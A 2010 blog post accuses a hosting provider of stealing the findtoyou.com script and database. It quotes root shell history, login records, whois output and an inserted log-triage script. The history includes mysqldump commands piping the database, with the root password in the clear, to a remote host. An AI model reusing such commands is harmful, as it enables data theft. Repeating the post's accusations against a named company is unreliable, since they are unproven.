Theft of the www.findtoyou.com script by the hosting provider www.stopanos.net

By k1n9k0ng
Published: April 29, 2010
Updated: April 29, 2010

Previously we rented a VPS from one of the hosting providers, http://www.stopanos.net, but it was apparently abused by a handful of irresponsible staff or admins who stole our source code and database. We want everyone to be careful so that this does not happen to them, and we ask http://www.stopanos.net, as the responsible party, to answer for the duplication of our http://www.findtoyou.com script.

Below are the links to our script that was taken, and we have even stronger evidence than all of this.

POC:

779 free
780 free
781 top
782 free
783 top
784 free
785 top
786 ps ax
787 killall nginx
788 /usr/local/nginx/sbin/nginx
789 free
790 ps ax
791 shutdown -r now
792 /usr/local/nginx/sbin/nginx
793 ps ax
794 free
795 top
796 DF -H
797 df -h
798 cd /home
799 ls
800 mv findtoyounginx.tar findtoyou.com/findtoyounginx.tar
801 cd findtoyou.com
802 ls
803 cd..
804 cd ..
805 cat wget-log
806 ls
807 tar -cf findtoyou.tar findtoyou.com
808 cd /home
809 tar -cf findtoyounginx.tar findtoyounginx.com
810 cd /home
811 ls
812 cd findtoyou.com
813 ls
814 cd ebook
815 ls
816 cd ..
817 ls
818 cd update-database
819 ls
820 pwd
821 cd ..
822 cd ..
823 cd iqbal
824 ls
825 cd findtoyou.com
826 ls
827 cd ..
828 cd findtoyou.com
829 ls
830 cd ..
831 cd admin
832 ls
833 cd ..
834 ls
835 cd update-database123
836 ls
837 cd /home
838 cd findtoyou.com
839 ls
840 mysqldump --opt -u root -p findtoyou> findtoyou.back.dump
841 ls
842 cd ..
843 ls
844 mw findtoyou.tar findtoyou.com/findtoyou.tar
845 move findtoyou.tar findtoyou.com/findtoyou.tar
846 cp findtoyou.tar findtoyou.com/findtoyou.tar
847 ls
848 cd findtoyou.com
849 ls
850 cd ..
851 rm -rf findtoyou.tar
852 ls
853 cd backup
854 ls
855 cd database-15-04-2010
856 ls
857 rm -rf findtoyou.back.dump
858 cd /home
859 ls
860 cd findtoyou.com
861 ls
862 rm -rf findtoyou.tar
863 rm -rf findtoyounginx.tar
864 ls
865 ls
866 cd /home
867 cd backup
868 ls
869 cd database-15-04-2010
870 ls
871 get findtoyou.sql
872 wget findtoyou.sql
873 ls
874 rm -rf index.html
875 get 64.120.143.204 findtoyou.sql
876 pwd
877 wget sftp://root@64.120.143.204:12203/home/backup/database-15-04-2010/findtoyou.sql
878 bye
879 \exit
880 cd /home
881 ls
882 cd findtoyou.com
883 ls
884 ssh server "gzip -c findtoyou.sql" |gunzip > findtoyou.sql
885 exit
886 cd /etc/
887 ls
888 cd ssh
889 ls
890 vi sshd_config
891 service sshd restart
892 w
893 cd /home
894 ls
895 cd backup
896 ls
897 cd database-15-04-2010
898 ls
899 cp findtoyou.sql /home/findtoyou.com/findtoyou.sql
900 cd /home/findtoyou.com/
901 ls
902 cd ..
903 cd www
904 ls
905 cd ..
906 ls
907 cd findtoyou.com
908 chmod 777 findtoyou.sql
909 ls
910 zip -r findtoyou.sql findtoyou.zip
911 cd ..
912 ls
913 zip findtoyou.zip findtoyou.com
914 zip -r findtoyou.zip findtoyou.com
915 pwd
916 cd findtoyou.com
917 ls
918 cd
919 pwd
920 cd /home
921 cd findtoyou.com
922 ls
923 chmod 777 findtoyou.back.dump
924 cd ..
925 tar -zcvf findtoyou.tar.gz findtoyou.com
926 cd /home
927 ls
928 ls
929 cd /home
930 ls
931 mysqldump -u root -malingscript findtoyou > findtoyou1.sql
932 mysqldump -u root -pmalingscript findtoyou > findtoyou1.sql
933 cd /home
934 ls
935 chmod 777 findtoyou1.sql
936 w
937 ls
938 ls
939 mysqldump .user root .password=malingscript .opt findtoyou | mysql .host=96.9.173.46 -C pdfsearc_database
940 mysqldump -u root -pmalingscript .opt findtoyou | mysql -host=96.9.173.46 -C pdfsearc_database
941 mysqldump -u root -pmalingscript -opt findtoyou | mysql -host=96.9.173.46 -C pdfsearc_database
942 mysqldump -u root -pmalingscript findtoyou | mysql -host=96.9.173.46 -C pdfsearc_database
943 mysqldump -u root -pmalingscript findtoyou | mysql -h96.9.173.46 -C pdfsearc_database
944 cd /home
945 ls
946 cd findtoyou.com
947 ls
948 cd computer-software
949 ls
950 cd tmp
951 ls
952 cd ..
953 ls
954 tar czvf tmp-software.tar.gz tmp
955 ls
956 pwd
957 cd ..
958 ls
959 cd cache
960 ls
961 cd ..
962 cd document
963 ls
964 cd /tmp
965 tar czvf tmp-document.tar.gz tmp
966 cd ..
967 pwd
968 cd /home
969 cd /home/findtoyou.com/
970 cd document
971 tar czvf tmp-document.tar.gz tmp
972 ls
973 rm -rf tmp-document.tar.gz
974 cd ..
975 ls
976 cd computer-software
977 ls
978 rm -rf tmp-software.tar.gz
979 ls
980 cd ebook
981 cd ..
982 cd ebook
983 ls
984 cd ..
985 cd update-database
986 ls
987 cd /home
988 ls
989 cd findtoyou.com
990 ls
991 cd ebook
992 ls
993 cd ..
994 cd ..
995 ls
996 rm -rf findtoyou.tar.gz
997 tar czvf findtoyou.tar.gz findtoyou.com
998 ls
999 pwd
1000 free
1001 history
1002 history
1003 adduser kingkong
1004 useradd kingkong
1005 /usr/sbin/useradd
1006 /usr/sbin/useradd kingkong
1007 passwd kingkong
1008 vi /etc/sudoers
1009 yum install iptables
1010 ls -la
1011 /etc/init.d/iptables save
1012 vi /etc/sysconfig/iptables
1013 history
1014 whois 96.9.173.46
1015 ifocnfig
1016 /sbin/ifconfig
1017 cd /home
1018 ls
1019 cat wget-log –
1020 cat wget-log
1021 whois 96.9.173.46
1022 mysqldump -u root -pmalingscript findtoyou | mysql -h96.9.173.46 -C pdfsearc_database
1023 mysql -h96.9.173.46
1024 mysql -h96.9.173.46
1025 nmap 96.9.173.46
1026 ping 96.9.173.46
1027 nmap 96.9.173.46 -p 3306
1028 mysql -h 96.9.173.46 -p
1029 mysql -h 96.9.173.46 -p
1030 history
1031 cd findtoyounginx.com/
1032 ls
1033 cd ..
1034 cat wget-log
1035 cd /home/backup
1036 ls
1037 ls -la
1038 iconfig
1039 /sbin/ifconfig
1040 last
1041 whois 202.70.59.200
1042 whois 202.70.59.200
1043 passwd iqbal
1044 ls
1045 lastlog
1046 history
1047 history
[root@server backup]#

Look at these lines:

939 mysqldump .user root .password=malingscript .opt findtoyou | mysql .host=96.9.173.46 -C pdfsearc_database
940 mysqldump -u root -pmalingscript .opt findtoyou | mysql -host=96.9.173.46 -C pdfsearc_database
941 mysqldump -u root -pmalingscript -opt findtoyou | mysql -host=96.9.173.46 -C pdfsearc_database
942 mysqldump -u root -pmalingscript findtoyou | mysql -host=96.9.173.46 -C pdfsearc_database
943 mysqldump -u root -pmalingscript findtoyou | mysql -h96.9.173.46 -C pdfsearc_database

They extract the database to a dedicated server owned by stopanos.net.

[root@server ~]# last
iqbal pts/1 118.97.67.155 Wed Apr 21 10:08 still logged in
kingkong pts/3 114.121.164.232 Wed Apr 21 09:47 – 09:51 (00:04)
kingkong pts/3 114.121.164.232 Wed Apr 21 09:09 – 09:12 (00:02)
iqbal pts/0 118.97.67.155 Wed Apr 21 09:03 still logged in
root pts/2 118.97.67.155 Wed Apr 21 08:48 – 10:10 (01:21)
iqbal pts/1 118.97.67.155 Wed Apr 21 08:38 – 09:58 (01:19)
root pts/1 114.123.113.28 Wed Apr 21 07:46 – 07:48 (00:02)
iqbal pts/0 118.97.67.155 Wed Apr 21 07:41 – 08:58 (01:17)
iqbal pts/0 fm-ip-118.136.32 Wed Apr 21 03:53 – 05:03 (01:09)
root pts/4 202.70.59.200 Tue Apr 20 23:11 – 02:41 (03:29)
root pts/2 202.70.59.200 Tue Apr 20 22:36 – 00:47 (02:11)
root pts/1 202.70.59.200 Tue Apr 20 22:04 – 00:40 (02:36)
root pts/3 202.70.59.200 Tue Apr 20 21:33 – 23:45 (02:11)
root pts/0 202.70.59.200 Tue Apr 20 21:12 – 23:31 (02:18)
root pts/2 202.70.59.200 Tue Apr 20 20:13 – 22:29 (02:16)
root pts/1 202.70.59.200 Tue Apr 20 19:41 – 21:57 (02:15)
root pts/0 202.70.59.200 Tue Apr 20 18:58 – 21:09 (02:11)
root pts/1 173.212.255.70 Tue Apr 20 16:36 – 16:38 (00:01)
root pts/1 173.212.255.70 Tue Apr 20 16:08 – 16:18 (00:10)
root pts/0 114.125.141.211 Tue Apr 20 16:06 – 17:41 (01:35)
iqbal pts/1 118.97.67.155 Tue Apr 20 10:03 – 10:50 (00:47)
iqbal pts/0 118.97.67.155 Tue Apr 20 09:07 – 10:20 (01:12)
iqbal pts/0 118.97.67.155 Tue Apr 20 06:40 – 07:59 (01:19)
root pts/10 202.70.59.200 Tue Apr 20 04:18 – 06:31 (02:12)
iqbal pts/9 fm-ip-118.136.97 Tue Apr 20 04:15 – 04:48 (00:33)
iqbal pts/8 fm-ip-118.136.97 Tue Apr 20 04:12 – 04:48 (00:35)
root pts/7 202.70.59.200 Tue Apr 20 04:11 – 06:22 (02:11)
root pts/6 202.70.59.200 Tue Apr 20 03:42 – 06:11 (02:29)
iqbal pts/5 fm-ip-118.136.97 Tue Apr 20 03:40 – 04:48 (01:08)
root pts/4 202.70.59.200 Tue Apr 20 03:36 – 05:47 (02:11)
root pts/3 202.70.59.200 Tue Apr 20 03:25 – 04:56 (01:31)
root pts/2 202.70.59.200 Tue Apr 20 03:15 – 05:01 (01:46)
root pts/1 202.70.59.200 Tue Apr 20 02:42 – 05:16 (02:34)
iqbal pts/0 118.97.67.155 Mon Apr 19 07:31 – 08:51 (01:19)

wtmp begins Mon Apr 19 04:01:56 2010

From line 800 to the end there is a log of the database being backed up.

And here is the IP in the `last` output that did it; look carefully:

root pts/1 173.212.255.70 Tue Apr 20 16:36 – 16:38 (00:01)
root pts/1 173.212.255.70 Tue Apr 20 16:08 – 16:18 (00:10)
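As an added example (not part of the original post, and not the author's or the provider's tooling), this Python script applies the two checks made by hand above to constructed sample lines modelled on the `last` output and shell history quoted here: root logins from hosts outside a known-admin allowlist, mysqldump commands piped into a mysql client on a remote host, and the inline passwords such commands leave in the history. The allowlist and the sample lines are assumptions.

```python
import re

# Constructed sample lines modelled on the `last` output and bash history quoted in the post.
LAST_OUTPUT = """\
root pts/1 173.212.255.70 Tue Apr 20 16:36 - 16:38 (00:01)
root pts/0 114.125.141.211 Tue Apr 20 16:06 - 17:41 (01:35)
iqbal pts/1 118.97.67.155 Tue Apr 20 10:03 - 10:50 (00:47)
root pts/2 118.97.67.155 Wed Apr 21 08:48 - 10:10 (01:21)
wtmp begins Mon Apr 19 04:01:56 2010
"""
HISTORY = """\
931 mysqldump -u root -malingscript findtoyou > findtoyou1.sql
940 mysqldump -u root -pmalingscript .opt findtoyou | mysql -host=96.9.173.46 -C pdfsearc_database
943 mysqldump -u root -pmalingscript findtoyou | mysql -h96.9.173.46 -C pdfsearc_database
944 cd /home
"""
# Assumption: the admin's own source address; any other host logging in as root is suspect.
KNOWN_ADMIN_IPS = {"118.97.67.155"}

LAST_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<tty>\S+)\s+(?P<host>\S+)\s+"
    r"(?P<start>[A-Za-z]{3} [A-Za-z]{3} \d{1,2} \d\d:\d\d)"
)
IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
# Destination of a `mysql` client invocation: -hHOST, -h HOST, -host=HOST or --host=HOST.
MYSQL_HOST_RE = re.compile(r"\bmysql\s.*?(?:-h\s*|--?host=)(?P<host>" + IPV4 + ")")
INLINE_PW_RE = re.compile(r"\s-p\S+")  # password given directly after -p

def parse_last(text):
    """Parse `last`-style lines into dicts; the trailing 'wtmp begins ...' line does not match."""
    return [m.groupdict() for m in map(LAST_RE.match, text.splitlines()) if m]

def unexpected_root_logins(records, known_ips):
    """Root sessions whose source host is not in the allowlist, as (host, start) pairs."""
    return [(r["host"], r["start"]) for r in records
            if r["user"] == "root" and r["host"] not in known_ips]

def remote_dump_targets(history):
    """Hosts that received a mysqldump stream piped straight into a remote mysql client."""
    hits = set()
    for line in history.splitlines():
        if "mysqldump" in line and "| mysql" in line:
            m = MYSQL_HOST_RE.search(line)
            if m:
                hits.add(m.group("host"))
    return sorted(hits)

def commands_with_inline_password(history):
    """Count history lines that pass a MySQL password on the command line (-pSECRET)."""
    return sum(1 for line in history.splitlines() if INLINE_PW_RE.search(line))

if __name__ == "__main__":
    print(unexpected_root_logins(parse_last(LAST_OUTPUT), KNOWN_ADMIN_IPS))
    print(remote_dump_targets(HISTORY), commands_with_inline_password(HISTORY))
```

The inline-password count is a reminder that `-pSECRET` in shell history is itself a finding: anyone who can read the history file now holds the database root password.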

[root@server ~]# whois 173.212.255.70
[Querying whois.arin.net]
[Redirected to rwhois.hostnoc.net:4321]
[Querying rwhois.hostnoc.net]

[rwhois.hostnoc.net]
%rwhois V-1.5:003fff:00 rwhois.hostnoc.net (by Network Solutions, Inc. V-1.5.9.6)
network:Class-Name:network
network:ID:net-173.212.255.70/31
network:Auth-Area:173.212.192.0/18
network:Network-Name:NET-173.212.255.70/31
network:IP-Network:173.212.255.70/31
network:Organization;I:org-255-1182870-0
network:Org-Name:Stopanos Cyber Media c/o Network Operations Center, Inc.
network:Street-Address:PO Box 591
network:City:Scranton
network:State-Prov:PA
network:Postal-Code:18510-0591
network:Country-Code:US
network:Phone:+1-570-343-8551
network:Abuse-Email:abuse@hostnoc.net
network:Abuse-Phone:+1-570-343-8551
network:Tech-Email:nic@hostnoc.net
network:Tech-Phone:+1-570-343-8551

network:Class-Name:network
network:ID:net-173.212.192.0/18
network:Auth-Area:173.212.192.0/18
network:Network-Name:NET-173.212.192.0/18
network:IP-Network:173.212.192.0/18
network:Organization;I:org-0
network:Org-Name:Network Operations Center, Inc.
network:Street-Address:PO Box 591
network:City:Scranton
network:State-Prov:PA
network:Postal-Code:18501-0591
network:Country-Code:US
network:Phone:+1-570-343-8551
network:Abuse-Email:abuse@hostnoc.net
network:Abuse-Phone:+1-570-343-8551
network:Tech-Email:nic@hostnoc.net
network:Tech-Phone:+1-570-343-8551

%ok

OK, it is now clear who the perpetrator is: an enemy within.

We will prove it again:

http://www.extremedigger.com/
http://www.extremedigger.com/video/download-youtube.php?url=WFSBin9t_uA&name=Hatu%20Jamu%20Gendong%20Official%20Movie%20Trailercyberlog:%20anjing%20loe%20yg%20colong%20s…cript%20ditegur%20halus%20,%20bener2%20harus%20lewt%20jalur%20hukum
The domain belongs to:
http://whois.domaintools.com/173.212.255.70
OrgName: Network Operations Center Inc.
OrgID: NOC
Address: PO Box 591
City: Scranton
StateProv: PA
PostalCode: 18501-0591
Country: US

ReferralServer: rwhois://rwhois.hostnoc.net:4321/

NetRange: 173.212.192.0 – 173.212.255.255
CIDR: 173.212.192.0/18
OriginAS: AS21788
NetName: HOSTNOC-7BLK
NetHandle: NET-173-212-192-0-1
Parent: NET-173-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.HOSTNOC.NET
NameServer: NS2.HOSTNOC.NET
Comment:
RegDate: 2009-10-26
Updated: 2009-10-26

RAbuseHandle: SMA4-ARIN
RAbuseName: Arcus, S. Matthew
RAbusePhone: +1-570-343-8551
RAbuseEmail:

RNOCHandle: SMA4-ARIN
RNOCName: Arcus, S. Matthew
RNOCPhone: +1-570-343-8551
RNOCEmail:

RTechHandle: SMA4-ARIN
RTechName: Arcus, S. Matthew
RTechPhone: +1-570-343-8551
RTechEmail:

OrgTechHandle: SMA4-ARIN
OrgTechName: Arcus, S. Matthew
OrgTechPhone: +1-570-343-8551
OrgTechEmail:

== Additional Information From rwhois://rwhois.hostnoc.net:4321/ ==

network:Class-Name:network
network:ID:net-173.212.255.70/31
network:Auth-Area:173.212.192.0/18
network:Network-Name:NET-173.212.255.70/31
network:IP-Network:173.212.255.70/31
network:Organization;I:org-255-1182870-0
network:Org-Name:Stopanos Cyber Media c/o Network Operations Center, Inc.
network:Street-Address:PO Box 591
network:City:Scranton
network:State-Prov:PA
network:Postal-Code:18510-0591
network:Country-Code:US
network:Phone:+1-570-343-8551
network:Abuse-Email:
network:Abuse-Phone:+1-570-343-8551
network:Tech-Email:
network:Tech-Phone:+1-570-343-8551

network:Class-Name:network
network:ID:net-173.212.192.0/18
network:Auth-Area:173.212.192.0/18
network:Network-Name:NET-173.212.192.0/18
network:IP-Network:173.212.192.0/18
network:Organization;I:org-0
network:Org-Name:Network Operations Center, Inc.
network:Street-Address:PO Box 591
network:City:Scranton
network:State-Prov:PA
network:Postal-Code:18501-0591
network:Country-Code:US
network:Phone:+1-570-343-8551
network:Abuse-Email:
network:Abuse-Phone:+1-570-343-8551
network:Tech-Email:
network:Tech-Phone:+1-570-343-855

Line 939:

streamingr ~ # whois 96.9.173.46
[Querying whois.arin.net]

[Redirected to rwhois.hostnoc.net:4321]
[Querying rwhois.hostnoc.net]

[rwhois.hostnoc.net]
%rwhois V-1.5:003fff:00 rwhois.hostnoc.net (by Network Solutions, Inc. V-1.5.9.6)
network:Class-Name:network
network:ID:net-96.9.173.46/31
network:Auth-Area:96.9.128.0/18
network:Network-Name:NET-96.9.173.46/31
network:IP-Network:96.9.173.46/31
network:Organization;I:org-173-1182846-0
network:Org-Name:Stopanos Cyber Media c/o Network Operations Center, Inc.
network:Street-Address:PO Box 591
network:City:Scranton
network:State-Prov:PA
network:Postal-Code:18510-0591
network:Country-Code:US
network:Phone:+1-570-343-8551
network:Abuse-Email:abuse@hostnoc.net
network:Abuse-Phone:+1-570-343-8551
network:Tech-Email:nic@hostnoc.net
network:Tech-Phone:+1-570-343-8551

network:Class-Name:network
network:ID:net-96.9.128.0/18
network:Auth-Area:96.9.128.0/18
network:Network-Name:NET-96.9.128.0/18
network:IP-Network:96.9.128.0/18
network:Organization;I:org-0
network:Org-Name:Network Operations Center, Inc.
network:Street-Address:PO Box 591
network:City:Scranton
network:State-Prov:PA
network:Postal-Code:18501-0591
network:Country-Code:US
network:Phone:+1-570-343-8551
network:Abuse-Email:abuse@hostnoc.net
network:Abuse-Phone:+1-570-343-8551
network:Tech-Email:nic@hostnoc.net
network:Tech-Phone:+1-570-343-8551

%ok

Look here again:

What kind of hacker dumps the database to a server at the same hosting provider??

Why not just download it somewhere outside? Claiming you were hacked, are you??? It is the same old song... hackers are not stupid!!!

Our suspicion began when we were told to move servers for a reason that made no sense, and before this we had already warned that the site http://www.pdfsearchfiles.com/ (same provider) was also running our script. Our goal is to enrich domestic content and, as the work of the nation's own people, to make searching easier for its users.
